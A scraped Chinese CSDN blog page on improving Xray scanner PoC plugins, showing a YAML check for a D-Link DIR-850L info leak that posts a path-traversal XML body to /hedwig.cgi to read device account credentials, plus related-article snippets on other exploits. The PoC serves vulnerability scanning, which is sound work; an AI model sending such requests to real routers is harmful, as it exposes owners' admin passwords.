xray插件改良3-poc-yaml-dlink-850l-info-leak

最新推荐文章于 2024-08-04 22:44:44 发布
最新推荐文章于 2024-08-04 22:44:44 发布
阅读量1.1k 收藏
点赞数
分类专栏: Xray插件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiru9972/article/details/115125129
版权
本文档详细介绍了针对D-Link 850L设备的两个信息泄漏漏洞的POC(Proof of Concept)改进。原始POC利用了设备配置文件的不当访问,而改良版POC增加了另一种攻击向量,通过不同的请求路径和参数触发信息泄漏。作者提供了详细的请求配置和响应检查表达式,并提到了相关CVE。这些漏洞可以通过合并检测进行更有效的安全防护。
摘要由CSDN通过智能技术生成

xray插件改良3-poc-yaml-dlink-850l-info-leak

前言

poc-yaml-dlink-850l-info-leak原始的yml
poc-yaml-dlink-850l-info-leak

name: poc-yaml-dlink-850l-info-leak
rules:
  - method: POST
    path: /hedwig.cgi
    headers:
      Content-Type: text/xml
      Cookie: uid=R8tBjwtFc8
    body: |-
      <?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
    follow_redirects: false
    expression: >
      response.status == 200 && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>") && response.body.bcontains(b"<result>OK</result>")
detail:
  author: cc_ci
最低0.47元/天 解锁文章
_HWHXY
关注
专栏目录
红队专题-漏扫-Xray
aming小老弟
03-08 1419
Xray扫描器是一款功能强大的安全评估工具,它主要使用HTTP/HTTPS代理进行被动扫描。这款工具由多名经验丰富的一线安全从业者开发,具备多种特性使其在安全扫描和漏洞检测方面表现出色。Xray扫描器支持多种扫描和检测模块,包括SQL注入检测、命令注入检测、任意重定向检测、路径遍历模块等。此外,它还具有一些内置插件,如XSS漏洞检测、XML实体注入检测等,这些插件能够进一步提升其漏洞检测能力。在使用Xray扫描器时,可以通过开启监听、设置浏览器代理等方式,使其能够自动探测访问网站的漏洞。
再谈Laravel Debug mode RCE(CVE-2021-3129)漏洞
wangluoanquan111的博客
08-10 3152
Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。2021年01月12日,Laravel被披露存在一个远程代码执行漏洞(CVE-2021-3129)。当Laravel开启了Debug模式时,由于Laravel自带的Ignition组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。
Linux内核info leak漏洞
weixin_30408675的博客
10-28 801
1 Information Leak漏洞风险 从应用层软件,到hypervisor再到kernel代码,都存在Information Leak的风险。下面给出一些示例: 应用层软件:通常是应用敏感数据泄漏,比如从远程客户端获取服务端敏感数据。CVE-2012-0053,Openssl的心脏滴血等。 Hypervisor:主要是向guest泄漏hypervisor数据。CVE-2010-45...
WordPress--漏洞复现
最新发布
Jz031212的博客
08-04 208
4.访问这个文件显示出phpinfo证明注入成功。1.搭建好环境进入后台登录界面登录管理员。2.进入后选择外观---编辑。3.将文件内容改为我们的。
Xray捡洞中的高频漏洞
热门推荐
m0_49936858的博客
08-12 1万+
用 X-Ray 刷洞发现一些出现频率高的漏洞,把漏洞原理和利用方式稍作整理,按照危害排名,低危漏洞可以收集一些信息然后深度利用变高危。
SpringBoot的yaml配置注入
学不死就往死里学
08-10 3047
yaml语法学习 配置文件 SpringBoot使用一个全局的配置文件 , 配置文件名称是固定的 application.properties 语法结构 :key=value application.yml 语法结构 :key:空格 value 配置文件的作用 :修改SpringBoot自动配置的默认值,因为SpringBoot在底层都给我们自动配置好了; 比如我们可以在配置文件中修改Tomcat 默认启动的端口号!测试一下! server.port=8081 yaml概述 YAML是 “
xray插件改良7-poc-yaml-etouch-v2-sqli
HWHXY的博客
03-24 1187
xray插件改良7-poc-yaml-etouch-v2-sqli 前言 原始yml name: poc-yaml-etouch-v2-sqli rules: - method: GET path: >- /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e
xray插件改良2-poc-yaml-dedecms-cve-2018-6910
HWHXY的博客
03-23 1345
xray插件改良2-poc-yaml-dedecms-cve-2018-6910 前言 poc-yaml-dedecms-cve-2018-6910原始的yml dedecms-cve-2018-6910.yml name: poc-yaml-dedecms-cve-2018-6910 rules: - method: GET path: /include/downmix.inc.php expression: | response.status == 200 &&a
xray-poc-generation::dna: 辅助生成 XRay YAML POC
05-06
:dna: XRay POC Generation XRay安全评估 > POC辅助生成工具。 关于XRay: 访问 即可直接使用。 :laptop: 本地运行 ...cd xray-poc-generation yarn yarn build 编译完成后,Web目录在build/文件夹。
xray插件改良5-poc-yaml-duomicms-sqli
HWHXY的博客
03-23 589
xray插件改良5-poc-yaml-duomicms-sqli 前言 poc-yaml-duomicms-sqli原始的ymlpoc-yaml-duomicms-sqli name: poc-yaml-duomicms-sqli rules: - method: GET path: >- /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(20
pprof:pprof是用于可视化和分析配置文件数据的工具
02-28
介绍 pprof是用于可视化和分析配置文件数据的工具。 pprof读取profile.proto格式的概要分析样本的集合,并生成报告以可视化并帮助分析数据。 它可以生成文本和图形报告(通过使用点可视化程序包)。 profile.proto是一个协议缓冲区,用于描述一组调用栈和符号化信息。 一种常见用法是从统计分析中表示一组采样的调用堆栈。 格式在文件中描述。 有关协议缓冲区的详细信息,请参见 可以从本地文件或通过http读取配置文件。 可以汇总或比较相同类型的多个配置文件。 如果概要文件样本包含机器地址,则pprof可以通过使用本机binutils工具(addr2line和nm)来对它们进行符号化。 这不是Google的官方产品。 建立pprof 先决条件: 转到开发套件。 请按照安装go工具并设置GOPATH。 Graphviz: : 可选,用于生成轮廓的图形可视化 要
FCKeditor漏洞总结
01-24
FCKeditor漏洞总结。很全面!基本上FCK那些漏洞都在这里面!
CVE-2021-3129:Laravel调试RCE
05-26
CVE-2021-3129 Laravel debug rce 食用方法 执行docker-compse up -d启动环境 访问8888端口后点击首页面的generate key就可以复现了 关于docker环境想说的几点: 把.env.example复制到.env作用是开启debug环境 关闭了php.ini的phar.readonly 在resources/view/里添加了一个hello模板并引用了一个未定义变量,同时在routes/web.php添加路由(这个我加在源码里了,没写dockerfile里) 复现效果 脚本已放出,脚本要和phpggc项目文件夹在同一级目录下。 通用性不强(至少打我自己的环境可以),大家可自行把phpggc的其它rce链也加进去,提高通杀能力。 参考资源
Fckeditor漏洞利用方法总结
oceanark的博客
07-13 5953
1.查看编辑器版本 FCKeditor/_whatsnew.html —————————————————————————————————————— 2. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 —————————————————————————————————————— 3.Version action=”ht
FCKEditor配置及功能实现详解
weixin_45525177的博客
09-21 435
FCKEditor的word图片转存
春秋云镜-【仿真场景】Unauthorized writeup
渗透测试研究中心
03-07 918
说明Unauthorized是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。技术FTP、Privilege Elevation、AD CS、Kerberos、域渗透第一个flagdocker 未授权通过外网...
xray1.9.4高级社区版下载
qq_49869351的博客
01-12 7569
xray因其方便的代理检测模式,高效率,易于使用,和多样的poc闻名于安全圈。就这23年初始,xray就更新了1.9.4版本。已经添加了许可证,进行了pj。供大家下载,并且内置了superxray图像化界面,非常方便。
编辑器漏洞分析溯源(第1题)
weixin_47493074的博客
10-06 304
编辑器漏洞分析溯源(第1题)
xray-core v1.8.4
12-15
xray-core v1.8.4 是一个功能强大的 X 光扫描工具,它可以帮助用户检测和分析网络中的安全漏洞和风险。这个版本带来了一些重要的更新和改进,包括增强的扫描性能和更精确的漏洞识别能力。另外,还修复了一些已知的 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值